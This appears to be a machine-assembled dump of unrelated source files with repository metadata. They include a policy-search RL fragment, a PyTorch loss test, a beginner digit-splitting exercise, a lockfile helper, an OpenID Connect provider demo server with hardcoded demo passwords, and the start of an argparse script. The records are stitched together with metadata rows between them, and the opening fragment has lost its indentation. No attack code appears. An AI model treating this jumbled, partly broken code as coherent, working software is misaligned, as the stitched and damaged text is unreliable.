def sample(self, nb_episodes):
data = {'c': self.func.context(nb_episodes)}
data['x'] = self.ctl.action(data['c'])
data['r'] = self.func.eval(data['c'], data['x'])
return data
def features(self, c):
return self.basis.fit_transform(c.reshape(-1, self.cntxt_dim))
def dual(self, var, eps, beta, ctl, model, phi):
eta = var[0]
omega = var[1]
Raa, Rac, ra = model.Raa, model.Rac, model.ra
b, K, Q = ctl.b, ctl.K, ctl.cov
Qi = np.linalg.inv(Q)
F = eta * Qi - 2 * Raa
Fi = np.linalg.inv(F)
f = eta * (Qi @ b) + ra
L = eta * (Qi @ K) + 2 * Rac
M = 0.5 * (L.T @ (Fi @ L) - eta * K.T @ (Qi @ K))
_, q_lgdt = np.linalg.slogdet(2.0 * np.pi * Q)
_, f_lgdt = np.linalg.slogdet(2.0 * np.pi * (eta + omega) * Fi)
g = eta * eps - omega * beta - 0.5 * eta * b.T @ Qi @ b\
+ 0.5 * f.T @ Fi @ f - 0.5 * eta * q_lgdt + 0.5 * (eta + omega) * f_lgdt\
+ np.mean(phi @ (L.T @ (Fi @ f) - eta * K.T @ (Qi @ b)))\
+ np.mean(np.sum((phi @ M).T * phi.T, axis=0))
return g
def grad(self, var, eps, beta, ctl, model, phi):
eta = var[0]
omega = var[1]
Raa, Rac, ra = model.Raa, model.Rac, model.ra
b, K, Q= ctl.b, ctl.K, ctl.cov
Qi = np.linalg.inv(Q)
F = eta * Qi - 2 * Raa
Fi = np.linalg.inv(F)
f = eta * (Qi @ b) + ra
L = eta * (Qi @ K) + 2 * Rac
M = 0.5 * (L.T @ (Fi @ L) - eta * K.T @ (Qi @ K))
_, q_lgdt = np.linalg.slogdet(2.0 * np.pi * Q)
_, f_lgdt = np.linalg.slogdet(2.0 * np.pi * (eta + omega) * Fi)
dFi_deta = - (Fi.T @ (Qi @ Fi))
df_deta = Qi @ b
deta0 = eps - 0.5 * b.T @ df_deta + 0.5 * f.T @ dFi_deta @ f + f.T @ (Fi @ df_deta)\
- 0.5 * q_lgdt + 0.5 * f_lgdt - 0.5 * (eta + omega) * np.trace(Fi @ Qi)\
+ 0.5 * self.act_dim
detal = L.T @ (Fi @ df_deta) - L.T @ (Fi.T @ (Qi @ (Fi @ f)))\
+ (Qi @ K).T @ (Fi @ f) - K.T @ (Qi @ b)
detaq = 0.5 * L.T @ (dFi_deta @ L) + (Qi @ K).T @ (Fi @ L) - 0.5 * K.T @ Qi @ K
deta = deta0 + np.mean(phi @ detal, axis=0) + np.mean(np.sum((phi @ detaq).T * phi.T, axis=0))
domega = - beta + 0.5 * (f_lgdt + self.act_dim)
return np.hstack([deta, domega])
def run(self, nb_iter=100, verbose=False):
trace = {'rwrd': [], 'kl': [], 'ent': []}
for it in range(nb_iter):
# update entropy bound
ent_bound = self.ent_rate * (self.ctl.entropy() + self.h0) - self.h0
# sample current policy
self.data = self.sample(self.nb_episodes)
rwrd = np.mean(self.data['r'])
# get context features
self.phi = self.features(self.data['c'])
# fit quadratic model
self.model.fit(self.phi, self.data['x'], self.data['r'])
# optimize dual
init = np.stack((100.0, 1000.0))
bnds = ((1e-8, 1e8), (1e-8, 1e8))
res = sc.optimize.minimize(self.dual, init,
method='L-BFGS-B', jac=self.grad,
args=(self.kl_bound, ent_bound,
self.ctl, self.model, self.phi),
bounds=bnds)
self.eta = res.x[0]
self.omega = res.x[1]
# update policy
pi = self.ctl.update(self.eta, self.omega, self.model)
# check kl
kl = self.ctl.kli(pi, self.data['c'])
self.ctl = pi
ent = self.ctl.entropy()
trace['rwrd'].append(rwrd)
trace['kl'].append(kl)
trace['ent'].append(ent)
if verbose:
print('it=', it, f'rwrd={rwrd:{5}.{4}}',
f'kl={kl:{5}.{4}}',
f'ent={ent:{5}.{4}}')
if ent < -3e2:
break
return trace
| 8,033 | -26 | 474 |
2e15e14410009c204ee1fd1d8c430864f2e208fa | 681 | py | Python | tests/test_losses.py | feng-y16/Hamiltonian-Generative-Networks | 702d3ff3aec40eba20e17c5a1612b5b0b1e2f831 | [
"MIT"
] | 29 | 2020-09-14T11:59:03.000Z | 2022-03-10T16:31:19.000Z | tests/test_losses.py | feng-y16/Hamiltonian-Generative-Networks | 702d3ff3aec40eba20e17c5a1612b5b0b1e2f831 | [
"MIT"
] | 49 | 2020-09-14T12:33:51.000Z | 2021-01-21T22:52:17.000Z | tests/test_losses.py | feng-y16/Hamiltonian-Generative-Networks | 702d3ff3aec40eba20e17c5a1612b5b0b1e2f831 | [
"MIT"
] | 7 | 2020-11-10T16:20:31.000Z | 2022-01-09T10:49:59.000Z | import torch
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utilities.losses import kld_loss
test_kld_loss() | 29.608696 | 81 | 0.668135 | import torch
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utilities.losses import kld_loss
def test_kld_loss():
batch_sizes = [1, 10, 100]
latent_size = 8
for batch_size in [10]: #batch_sizes:
mu = torch.randn((batch_size, latent_size))
logvar = torch.randn((batch_size, latent_size))
kld = kld_loss(mu, logvar)
assert kld.dim() == 0
mu = torch.randn((batch_size, latent_size, latent_size, latent_size))
logvar = torch.randn((batch_size, latent_size, latent_size, latent_size))
kld = kld_loss(mu, logvar)
assert kld.dim() == 0
test_kld_loss() | 493 | 0 | 23 |
4c9f191f559541a62f958864ace3c9c32de00e4d | 257 | py | Python | python-mundo1/ex023.py | abm-astro/estudos-python | c0dcd71489e528d445efa25d4986bf2fd08f8fe6 | [
"MIT"
] | 1 | 2021-08-15T18:18:43.000Z | 2021-08-15T18:18:43.000Z | python-mundo1/ex023.py | abm-astro/estudos-python | c0dcd71489e528d445efa25d4986bf2fd08f8fe6 | [
"MIT"
] | null | null | null | python-mundo1/ex023.py | abm-astro/estudos-python | c0dcd71489e528d445efa25d4986bf2fd08f8fe6 | [
"MIT"
] | null | null | null | number = int(input('Digite um nรบmero de atรฉ 4 algarismos: '))
print(f'Analisando o nรบmero {number} ...')
u = number // 1 % 10
d = number // 10 % 10
c = number // 100 % 10
m = number // 1000 % 10
print(f'Unidade: {u}\nDezena: {d}\nCentena: {c}\nMilhar: {m}') | 36.714286 | 62 | 0.614786 | number = int(input('Digite um nรบmero de atรฉ 4 algarismos: '))
print(f'Analisando o nรบmero {number} ...')
u = number // 1 % 10
d = number // 10 % 10
c = number // 100 % 10
m = number // 1000 % 10
print(f'Unidade: {u}\nDezena: {d}\nCentena: {c}\nMilhar: {m}') | 0 | 0 | 0 |
0445556ee9637cca8a8f03fdbe424f60d870d8ec | 1,351 | py | Python | python/lockfile/Lockfile.py | devastating/misc | f9922e14a9305808e668d8412b7a2443a7f45a0d | [
"MIT"
] | null | null | null | python/lockfile/Lockfile.py | devastating/misc | f9922e14a9305808e668d8412b7a2443a7f45a0d | [
"MIT"
] | null | null | null | python/lockfile/Lockfile.py | devastating/misc | f9922e14a9305808e668d8412b7a2443a7f45a0d | [
"MIT"
] | null | null | null | #!/usr/bin/python
'''
Simple implementation for Linux lockfile
'''
import os
import time
def LockFile(target, retry=30, timeout=1):
'''
Use this method if you want to make sure only one process opens
the "target" file. The "target" path should be a path to a file
in an existing folder.
Create a tmp folder in the same directory as target
If the foler is created, we consider the target "locked"
@return True: succeed; False: failed
'''
targetDir = os.path.dirname(os.path.realpath(target))
if os.path.exists(targetDir) is False:
return False
lockFolder = os.path.join(targetDir, ".lock-" + os.path.basename(target))
tryCnt = 0
while tryCnt < retry:
tryCnt += 1
try:
os.mkdir(lockFolder)
return True
except OSError:
time.sleep(timeout)
return False
def ReleaseFile(target):
'''
Release the target by trying to remove the tmp dir
@return True: succeed; False: failed
'''
targetDir = os.path.dirname(os.path.realpath(target))
if os.path.exists(targetDir) is False:
return True
lockFolder = os.path.join(targetDir, ".lock-" + os.path.basename(target))
try:
os.rmdir(lockFolder)
except OSError:
return False if os.path.exists(lockFolder) else True
return True
| 27.02 | 77 | 0.646188 | #!/usr/bin/python
'''
Simple implementation for Linux lockfile
'''
import os
import time
def LockFile(target, retry=30, timeout=1):
'''
Use this method if you want to make sure only one process opens
the "target" file. The "target" path should be a path to a file
in an existing folder.
Create a tmp folder in the same directory as target
If the foler is created, we consider the target "locked"
@return True: succeed; False: failed
'''
targetDir = os.path.dirname(os.path.realpath(target))
if os.path.exists(targetDir) is False:
return False
lockFolder = os.path.join(targetDir, ".lock-" + os.path.basename(target))
tryCnt = 0
while tryCnt < retry:
tryCnt += 1
try:
os.mkdir(lockFolder)
return True
except OSError:
time.sleep(timeout)
return False
def ReleaseFile(target):
'''
Release the target by trying to remove the tmp dir
@return True: succeed; False: failed
'''
targetDir = os.path.dirname(os.path.realpath(target))
if os.path.exists(targetDir) is False:
return True
lockFolder = os.path.join(targetDir, ".lock-" + os.path.basename(target))
try:
os.rmdir(lockFolder)
except OSError:
return False if os.path.exists(lockFolder) else True
return True
| 0 | 0 | 0 |
8a4eee6bbaa12039e95643fb0658e9efe65e588b | 18,494 | py | Python | oidc_example/op3/server.py | kschu91/pyoidc | ae5702a8b2f13d5e7af173a58355cd738ec79a31 | [
"Apache-2.0"
] | 373 | 2017-03-08T21:37:03.000Z | 2022-03-24T13:37:23.000Z | oidc_example/op3/server.py | kschu91/pyoidc | ae5702a8b2f13d5e7af173a58355cd738ec79a31 | [
"Apache-2.0"
] | 523 | 2017-03-02T17:03:12.000Z | 2022-03-24T18:34:51.000Z | oidc_example/op3/server.py | kschu91/pyoidc | ae5702a8b2f13d5e7af173a58355cd738ec79a31 | [
"Apache-2.0"
] | 165 | 2017-03-02T16:54:42.000Z | 2022-02-26T18:34:00.000Z | #!/usr/bin/env python
__author__ = 'Vahid Jalili'
from urllib.parse import parse_qs
import json
import os
import re
import sys
import traceback
import argparse
import importlib
import logging
from mako.lookup import TemplateLookup
from oic import rndstr
from oic.oic.provider import AuthorizationEndpoint
from oic.oic.provider import EndSessionEndpoint
from oic.oic.provider import Provider
from oic.oic.provider import RegistrationEndpoint
from oic.oic.provider import TokenEndpoint
from oic.oic.provider import UserinfoEndpoint
from oic.utils import shelve_wrapper
from oic.utils.authn.authn_context import AuthnBroker
from oic.utils.authn.authn_context import make_auth_verify
from oic.utils.authn.client import verify_client
from oic.utils.authn.multi_auth import AuthnIndexedEndpointWrapper
from oic.utils.authn.user import UsernamePasswordMako
from oic.utils.authz import AuthzHandling
from oic.utils.http_util import *
from oic.utils.keyio import keyjar_init
from oic.utils.userinfo import UserInfo
from oic.utils.webfinger import OIC_ISSUER
from oic.utils.webfinger import WebFinger
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_builtin import BuiltinSSLAdapter
from oic.utils.sdb import create_session_db
LOGGER = logging.getLogger("")
LOGFILE_NAME = 'oc.log'
hdlr = logging.FileHandler(LOGFILE_NAME)
base_formatter = logging.Formatter(
"%(asctime)s %(name)s:%(levelname)s %(message)s")
CPC = ('%(asctime)s %(name)s:%(levelname)s '
'[%(client)s,%(path)s,%(cid)s] %(message)s')
cpc_formatter = logging.Formatter(CPC)
hdlr.setFormatter(base_formatter)
LOGGER.addHandler(hdlr)
LOGGER.setLevel(logging.DEBUG)
logger = logging.getLogger('oicServer')
# noinspection PyUnresolvedReferences
if __name__ == '__main__':
root = './'
lookup = TemplateLookup(directories=[root + 'Templates', root + 'htdocs'],
module_directory=root + 'modules',
input_encoding='utf-8', output_encoding='utf-8')
usernamePasswords = {
"user1": "1",
"user2": "2"
}
passwordEndPointIndex = 0 # what is this, and what does its value mean?
# JWKS: JSON Web Key
jwksFileName = "static/jwks.json"
# parse the parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', dest='config')
parser.add_argument('-d', dest='debug', action='store_true')
args = parser.parse_args()
# parse and setup configuration
config = importlib.import_module(args.config)
config.ISSUER = config.ISSUER + ':{}/'.format(config.PORT)
config.SERVICEURL = config.SERVICEURL.format(issuer=config.ISSUER)
endPoints = config.AUTHENTICATION["UserPassword"]["EndPoints"]
fullEndPointsPath = ["%s%s" % (config.ISSUER, ep) for ep in endPoints]
# TODO: why this instantiation happens so early? can I move it later?
# An OIDC Authorization/Authentication server is designed to
# allow more than one authentication method to be used by the server.
# And that is what the AuthBroker is for.
# Given information about the authorisation request, the AuthBroker
# chooses which method(s) to be used for authenticating the person/entity.
# According to the OIDC standard a Relaying Party can say
# 'I want this type of authentication', and the AuthnBroker tries to pick
# methods from the set it has been supplied, to map that request.
authnBroker = AuthnBroker()
# UsernamePasswordMako: authenticas a user using the username/password form in a
# WSGI environment using Mako as template system
usernamePasswordAuthn = UsernamePasswordMako(
None, # server instance
"login.mako", # a mako template
lookup, # lookup template
usernamePasswords, # username/password dictionary-like database
"%sauthorization" % config.ISSUER, # where to send the user after authentication
None, # templ_arg_func ??!!
fullEndPointsPath) # verification endpoints
# AuthnIndexedEndpointWrapper is a wrapper class for using an authentication module with multiple endpoints.
authnIndexedEndPointWrapper = AuthnIndexedEndpointWrapper(usernamePasswordAuthn, passwordEndPointIndex)
authnBroker.add(config.AUTHENTICATION["UserPassword"]["ACR"], # (?!)
authnIndexedEndPointWrapper, # (?!) method: an identifier of the authentication method.
config.AUTHENTICATION["UserPassword"]["WEIGHT"], # security level
"") # (?!) authentication authority
# ?!
authz = AuthzHandling()
clientDB = shelve_wrapper.open(config.CLIENTDB)
# In-Memory non-persistent SessionDB issuing DefaultTokens
sessionDB = create_session_db(config.ISSUER,
secret=rndstr(32),
password=rndstr(32))
provider = Provider(
name=config.ISSUER, # name
sdb=sessionDB, # session database.
cdb=clientDB, # client database
authn_broker=authnBroker, # authn broker
userinfo=None, # user information
authz=authz, # authz
client_authn=verify_client, # client authentication
symkey=config.SYM_KEY, # Used for Symmetric key authentication
# urlmap = None, # ?
# keyjar = None, # ?
# hostname = "", # ?
template_renderer=mako_renderer, # Rendering custom templates
# verify_ssl = True, # Enable SSL certs
# capabilities = None, # ?
# schema = OpenIDSchema, # ?
# jwks_uri = '', # ?
# jwks_name = '', # ?
baseurl=config.ISSUER,
# client_cert = None # ?
)
# SessionDB:
# This is database where the provider keeps information about
# the authenticated/authorised users. It includes information
# such as "what has been asked for (claims, scopes, and etc. )"
# and "the state of the session". There is one entry in the
# database per person
#
# __________ Note __________
# provider.keyjar is an interesting parameter,
# currently it uses default values, but
# if you have time, it worth investigating.
for authnIndexedEndPointWrapper in authnBroker:
authnIndexedEndPointWrapper.srv = provider
# TODO: this is a point to consider: what if user data in a database?
if config.USERINFO == "SIMPLE":
provider.userinfo = UserInfo(config.USERDB)
provider.cookie_ttl = config.COOKIETTL
provider.cookie_name = config.COOKIENAME
if args.debug:
provider.debug = True
try:
# JWK: JSON Web Key
# JWKS: is a dictionary of JWK
# __________ NOTE __________
# JWKS contains private key information.
#
# keyjar_init configures cryptographic key
# based on the provided configuration "keys".
jwks = keyjar_init(
provider, # server/client instance
config.keys, # key configuration
kid_template="op%d") # template by which to build the kids (key ID parameter)
except Exception as err:
# LOGGER.error("Key setup failed: %s" % err)
provider.key_setup("static", sig={"format": "jwk", "alg": "rsa"})
else:
for key in jwks["keys"]:
for k in key.keys():
key[k] = as_unicode(key[k])
f = open(jwksFileName, "w")
f.write(json.dumps(jwks))
f.close()
provider.jwks_uri = "%s%s" % (provider.baseurl, jwksFileName)
# for b in OAS.keyjar[""]:
# LOGGER.info("OC3 server keys: %s" % b)
# TODO: Questions:
# END_POINT is defined as a dictionary in the configuration file,
# why not defining it as string with "verify" value?
# after all, we have only one end point.
# can we have multiple end points for password? why?
endPoint = config.AUTHENTICATION["UserPassword"]["EndPoints"][passwordEndPointIndex]
_urls = []
_urls.append((r'^' + endPoint, make_auth_verify(authnIndexedEndPointWrapper.verify)))
_app = Application(provider, _urls)
# Setup the web server
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', config.PORT), _app.application) # nosec
server.ssl_adapter = BuiltinSSLAdapter(config.SERVER_CERT, config.SERVER_KEY)
print("OIDC Provider server started (issuer={}, port={})".format(config.ISSUER, config.PORT))
try:
server.start()
except KeyboardInterrupt:
server.stop()
| 37.975359 | 119 | 0.610414 | #!/usr/bin/env python
__author__ = 'Vahid Jalili'
from urllib.parse import parse_qs
import json
import os
import re
import sys
import traceback
import argparse
import importlib
import logging
from mako.lookup import TemplateLookup
from oic import rndstr
from oic.oic.provider import AuthorizationEndpoint
from oic.oic.provider import EndSessionEndpoint
from oic.oic.provider import Provider
from oic.oic.provider import RegistrationEndpoint
from oic.oic.provider import TokenEndpoint
from oic.oic.provider import UserinfoEndpoint
from oic.utils import shelve_wrapper
from oic.utils.authn.authn_context import AuthnBroker
from oic.utils.authn.authn_context import make_auth_verify
from oic.utils.authn.client import verify_client
from oic.utils.authn.multi_auth import AuthnIndexedEndpointWrapper
from oic.utils.authn.user import UsernamePasswordMako
from oic.utils.authz import AuthzHandling
from oic.utils.http_util import *
from oic.utils.keyio import keyjar_init
from oic.utils.userinfo import UserInfo
from oic.utils.webfinger import OIC_ISSUER
from oic.utils.webfinger import WebFinger
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_builtin import BuiltinSSLAdapter
from oic.utils.sdb import create_session_db
LOGGER = logging.getLogger("")
LOGFILE_NAME = 'oc.log'
hdlr = logging.FileHandler(LOGFILE_NAME)
base_formatter = logging.Formatter(
"%(asctime)s %(name)s:%(levelname)s %(message)s")
CPC = ('%(asctime)s %(name)s:%(levelname)s '
'[%(client)s,%(path)s,%(cid)s] %(message)s')
cpc_formatter = logging.Formatter(CPC)
hdlr.setFormatter(base_formatter)
LOGGER.addHandler(hdlr)
LOGGER.setLevel(logging.DEBUG)
logger = logging.getLogger('oicServer')
def static_file(path):
try:
os.stat(path)
return True
except OSError:
return False
# noinspection PyUnresolvedReferences
def static(self, environ, start_response, path):
logger.info("[static]sending: %s" % (path,))
try:
data = open(path, 'rb').read()
if path.endswith(".ico"):
start_response('200 OK', [('Content-Type', "image/x-icon")])
elif path.endswith(".html"):
start_response('200 OK', [('Content-Type', 'text/html')])
elif path.endswith(".json"):
start_response('200 OK', [('Content-Type', 'application/json')])
elif path.endswith(".txt"):
start_response('200 OK', [('Content-Type', 'text/plain')])
elif path.endswith(".css"):
start_response('200 OK', [('Content-Type', 'text/css')])
else:
start_response('200 OK', [('Content-Type', "text/xml")])
return [data]
except IOError:
resp = NotFound()
return resp(environ, start_response)
def check_session_iframe(self, environ, start_response, logger):
return static(self, environ, start_response, "htdocs/op_session_iframe.html")
def key_rollover(self, environ, start_response, _):
# expects a post containing the necessary information
_txt = get_post(environ)
_jwks = json.loads(_txt)
# logger.info("Key rollover to")
provider.do_key_rollover(_jwks, "key_%d_%%d" % int(time.time()))
# Dump to file
f = open(jwksFileName, "w")
f.write(json.dumps(provider.keyjar.export_jwks()))
f.close()
resp = Response("OK")
return resp(environ, start_response)
def clear_keys(self, environ, start_response, _):
provider.remove_inactive_keys()
resp = Response("OK")
return resp(environ, start_response)
class Application(object):
def __init__(self, provider, urls):
self.provider = provider
self.endpoints = [
AuthorizationEndpoint(self.authorization),
TokenEndpoint(self.token),
UserinfoEndpoint(self.userinfo),
RegistrationEndpoint(self.registration),
EndSessionEndpoint(self.endsession),
]
self.provider.endp = self.endpoints
self.urls = urls
self.urls.extend([
(r'^.well-known/openid-configuration', self.op_info),
(r'^.well-known/simple-web-discovery', self.swd_info),
(r'^.well-known/host-meta.json', self.meta_info),
(r'^.well-known/webfinger', self.webfinger),
(r'.+\.css$', self.css),
(r'safe', self.safe),
(r'^keyrollover', key_rollover),
(r'^clearkeys', clear_keys),
(r'^check_session', check_session_iframe)
])
for endp in self.endpoints:
self.urls.append(("^%s" % endp.etype, endp.func))
# noinspection PyUnusedLocal
def safe(self, environ, start_response):
_srv = self.provider.server
_log_info = self.provider.logger.info
_log_info("- safe -")
try:
authz = environ["HTTP_AUTHORIZATION"]
(typ, code) = authz.split(" ")
except KeyError:
resp = BadRequest("Missing authorization information")
return resp(environ, start_response)
else:
if typ != "Bearer":
resp = BadRequest("Unsupported authorization method")
return resp(environ, start_response)
try:
_sinfo = _srv.sdb[code]
except KeyError:
resp = Unauthorized("Not authorized")
return resp(environ, start_response)
info = "'%s' secrets" % _sinfo["sub"]
resp = Response(info)
return resp(environ, start_response)
# noinspection PyUnusedLocal
def css(self, environ, start_response):
try:
info = open(environ["PATH_INFO"]).read()
resp = Response(info)
except (OSError, IOError):
resp = NotFound(environ["PATH_INFO"])
return resp(environ, start_response)
# noinspection PyUnusedLocal
def token(self, environ, start_response):
return wsgi_wrapper(environ, start_response, self.provider.token_endpoint,
logger=logger)
# noinspection PyUnusedLocal
def authorization(self, environ, start_response):
return wsgi_wrapper(environ, start_response,
self.provider.authorization_endpoint, logger=logger) # cookies required.
# noinspection PyUnusedLocal
def userinfo(self, environ, start_response):
return wsgi_wrapper(environ, start_response, self.provider.userinfo_endpoint,
logger=logger)
# noinspection PyUnusedLocal
def op_info(self, environ, start_response):
return wsgi_wrapper(environ, start_response,
self.provider.providerinfo_endpoint, logger=logger)
# noinspection PyUnusedLocal
def registration(self, environ, start_response):
if environ["REQUEST_METHOD"] == "POST":
return wsgi_wrapper(environ, start_response,
self.provider.registration_endpoint,
logger=logger)
elif environ["REQUEST_METHOD"] == "GET":
return wsgi_wrapper(environ, start_response,
self.provider.read_registration, logger=logger)
else:
resp = ServiceError("Method not supported")
return resp(environ, start_response)
# noinspection PyUnusedLocal
def check_id(self, environ, start_response):
return wsgi_wrapper(environ, start_response, self.provider.check_id_endpoint,
logger=logger)
# noinspection PyUnusedLocal
def swd_info(self, environ, start_response):
return wsgi_wrapper(environ, start_response, self.provider.discovery_endpoint,
logger=logger)
# noinspection PyUnusedLocal
def trace_log(self, environ, start_response):
return wsgi_wrapper(environ, start_response, self.provider.tracelog_endpoint,
logger=logger)
# noinspection PyUnusedLocal
def endsession(self, environ, start_response):
return wsgi_wrapper(environ, start_response,
self.provider.endsession_endpoint, logger=logger)
# noinspection PyUnusedLocal
def meta_info(self, environ, start_response):
"""
Returns something like this::
{"links":[
{
"rel":"http://openid.net/specs/connect/1.0/issuer",
"href":"https://openidconnect.info/"
}
]}
"""
print('\n in meta-info')
pass
def webfinger(self, environ, start_response):
query = parse_qs(environ["QUERY_STRING"])
try:
rel = query["rel"]
resource = query["resource"][0]
except KeyError:
resp = BadRequest("Missing parameter in request")
else:
if rel != [OIC_ISSUER]:
resp = BadRequest("Bad issuer in request")
else:
wf = WebFinger()
resp = Response(wf.response(subject=resource,
base=self.provider.baseurl))
return resp(environ, start_response)
def application(self, environ, start_response):
"""
The main WSGI application. Dispatch the current request to
the functions from above and store the regular expression
captures in the WSGI environment as `oic.url_args` so that
the functions from above can access the url placeholders.
If nothing matches call the `not_found` function.
:param environ: The HTTP application environment
:param start_response: The application to run when the handling of the
request is done
:return: The response as a list of lines
"""
path = environ.get('PATH_INFO', '').lstrip('/')
print('start_response: ', start_response)
if path == "robots.txt":
return static(self, environ, start_response, "static/robots.txt")
environ["oic.oas"] = self.provider
if path.startswith("static/"):
return static(self, environ, start_response, path)
for regex, callback in self.urls:
match = re.search(regex, path)
if match is not None:
try:
environ['oic.url_args'] = match.groups()[0]
except IndexError:
environ['oic.url_args'] = path
try:
return callback(environ, start_response)
except Exception as err:
print("%s" % err)
message = traceback.format_exception(*sys.exc_info())
print(message)
logger.exception("%s" % err)
resp = ServiceError("%s" % err)
return resp(environ, start_response)
LOGGER.debug("unknown side: %s" % path)
resp = NotFound("Couldn't find the side you asked for!")
return resp(environ, start_response)
if __name__ == '__main__':
root = './'
lookup = TemplateLookup(directories=[root + 'Templates', root + 'htdocs'],
module_directory=root + 'modules',
input_encoding='utf-8', output_encoding='utf-8')
def mako_renderer(template_name, context):
mte = lookup.get_template(template_name)
return mte.render(**context)
usernamePasswords = {
"user1": "1",
"user2": "2"
}
passwordEndPointIndex = 0 # what is this, and what does its value mean?
# JWKS: JSON Web Key
jwksFileName = "static/jwks.json"
# parse the parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', dest='config')
parser.add_argument('-d', dest='debug', action='store_true')
args = parser.parse_args()
# parse and setup configuration
config = importlib.import_module(args.config)
config.ISSUER = config.ISSUER + ':{}/'.format(config.PORT)
config.SERVICEURL = config.SERVICEURL.format(issuer=config.ISSUER)
endPoints = config.AUTHENTICATION["UserPassword"]["EndPoints"]
fullEndPointsPath = ["%s%s" % (config.ISSUER, ep) for ep in endPoints]
# TODO: why this instantiation happens so early? can I move it later?
# An OIDC Authorization/Authentication server is designed to
# allow more than one authentication method to be used by the server.
# And that is what the AuthBroker is for.
# Given information about the authorisation request, the AuthBroker
# chooses which method(s) to be used for authenticating the person/entity.
# According to the OIDC standard a Relaying Party can say
# 'I want this type of authentication', and the AuthnBroker tries to pick
# methods from the set it has been supplied, to map that request.
authnBroker = AuthnBroker()
# UsernamePasswordMako: authenticas a user using the username/password form in a
# WSGI environment using Mako as template system
usernamePasswordAuthn = UsernamePasswordMako(
None, # server instance
"login.mako", # a mako template
lookup, # lookup template
usernamePasswords, # username/password dictionary-like database
"%sauthorization" % config.ISSUER, # where to send the user after authentication
None, # templ_arg_func ??!!
fullEndPointsPath) # verification endpoints
# AuthnIndexedEndpointWrapper is a wrapper class for using an authentication module with multiple endpoints.
authnIndexedEndPointWrapper = AuthnIndexedEndpointWrapper(usernamePasswordAuthn, passwordEndPointIndex)
authnBroker.add(config.AUTHENTICATION["UserPassword"]["ACR"], # (?!)
authnIndexedEndPointWrapper, # (?!) method: an identifier of the authentication method.
config.AUTHENTICATION["UserPassword"]["WEIGHT"], # security level
"") # (?!) authentication authority
# ?!
authz = AuthzHandling()
clientDB = shelve_wrapper.open(config.CLIENTDB)
# In-Memory non-persistent SessionDB issuing DefaultTokens
sessionDB = create_session_db(config.ISSUER,
secret=rndstr(32),
password=rndstr(32))
provider = Provider(
name=config.ISSUER, # name
sdb=sessionDB, # session database.
cdb=clientDB, # client database
authn_broker=authnBroker, # authn broker
userinfo=None, # user information
authz=authz, # authz
client_authn=verify_client, # client authentication
symkey=config.SYM_KEY, # Used for Symmetric key authentication
# urlmap = None, # ?
# keyjar = None, # ?
# hostname = "", # ?
template_renderer=mako_renderer, # Rendering custom templates
# verify_ssl = True, # Enable SSL certs
# capabilities = None, # ?
# schema = OpenIDSchema, # ?
# jwks_uri = '', # ?
# jwks_name = '', # ?
baseurl=config.ISSUER,
# client_cert = None # ?
)
# SessionDB:
# This is database where the provider keeps information about
# the authenticated/authorised users. It includes information
# such as "what has been asked for (claims, scopes, and etc. )"
# and "the state of the session". There is one entry in the
# database per person
#
# __________ Note __________
# provider.keyjar is an interesting parameter,
# currently it uses default values, but
# if you have time, it worth investigating.
for authnIndexedEndPointWrapper in authnBroker:
authnIndexedEndPointWrapper.srv = provider
# TODO: this is a point to consider: what if user data in a database?
if config.USERINFO == "SIMPLE":
provider.userinfo = UserInfo(config.USERDB)
provider.cookie_ttl = config.COOKIETTL
provider.cookie_name = config.COOKIENAME
if args.debug:
provider.debug = True
try:
# JWK: JSON Web Key
# JWKS: is a dictionary of JWK
# __________ NOTE __________
# JWKS contains private key information.
#
# keyjar_init configures cryptographic key
# based on the provided configuration "keys".
jwks = keyjar_init(
provider, # server/client instance
config.keys, # key configuration
kid_template="op%d") # template by which to build the kids (key ID parameter)
except Exception as err:
# LOGGER.error("Key setup failed: %s" % err)
provider.key_setup("static", sig={"format": "jwk", "alg": "rsa"})
else:
for key in jwks["keys"]:
for k in key.keys():
key[k] = as_unicode(key[k])
f = open(jwksFileName, "w")
f.write(json.dumps(jwks))
f.close()
provider.jwks_uri = "%s%s" % (provider.baseurl, jwksFileName)
# for b in OAS.keyjar[""]:
# LOGGER.info("OC3 server keys: %s" % b)
# TODO: Questions:
# END_POINT is defined as a dictionary in the configuration file,
# why not defining it as string with "verify" value?
# after all, we have only one end point.
# can we have multiple end points for password? why?
endPoint = config.AUTHENTICATION["UserPassword"]["EndPoints"][passwordEndPointIndex]
_urls = []
_urls.append((r'^' + endPoint, make_auth_verify(authnIndexedEndPointWrapper.verify)))
_app = Application(provider, _urls)
# Setup the web server
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', config.PORT), _app.application) # nosec
server.ssl_adapter = BuiltinSSLAdapter(config.SERVER_CERT, config.SERVER_KEY)
print("OIDC Provider server started (issuer={}, port={})".format(config.ISSUER, config.PORT))
try:
server.start()
except KeyboardInterrupt:
server.stop()
| 6,234 | 2,979 | 164 |
7eae67215162eb3733569a02295ab225f4a06ab6 | 8,636 | py | Python | tools/phenomics/gol_blood/gol_blood.py | skitchen19/galaxy_tools | b935f36cfe430263564503ebb71f78dc79315acb | [
"MIT"
] | 3 | 2017-04-05T18:01:59.000Z | 2019-05-03T14:15:31.000Z | tools/phenomics/gol_blood/gol_blood.py | skitchen19/galaxy_tools | b935f36cfe430263564503ebb71f78dc79315acb | [
"MIT"
] | 6 | 2019-02-27T15:45:58.000Z | 2021-01-12T15:18:50.000Z | tools/phenomics/gol_blood/gol_blood.py | skitchen19/galaxy_tools | b935f36cfe430263564503ebb71f78dc79315acb | [
"MIT"
] | 2 | 2018-10-26T18:36:39.000Z | 2019-01-28T15:12:39.000Z | #!/usr/bin/env python
import argparse
import numpy as np
import os
import data_utils
import mle_sphere
import gen_sphere
import gen_sphere_grid
import gen_r_sig_3d
import gen_selection_in_g_3d
import metrics
import param_ss
import mle_priors_3d
DEFAULT_MLE_SPHERE_PARAM_DICT = dict(xc=0, yc=0, zc=0, r=1, rSig=0.3, xE=1.2, yE=1, zE=0.8)
GRID = np.array([-3, -2, -1, 1, 2, 3])
SCALEFACTOR = 1
parser = argparse.ArgumentParser()
parser.add_argument('--burnin', action='store', dest='burnin', type=int, required=False, default=250, help='Not sure')
parser.add_argument('--input_dir', action='store', dest='input_dir', help='Directory of input csv image point files')
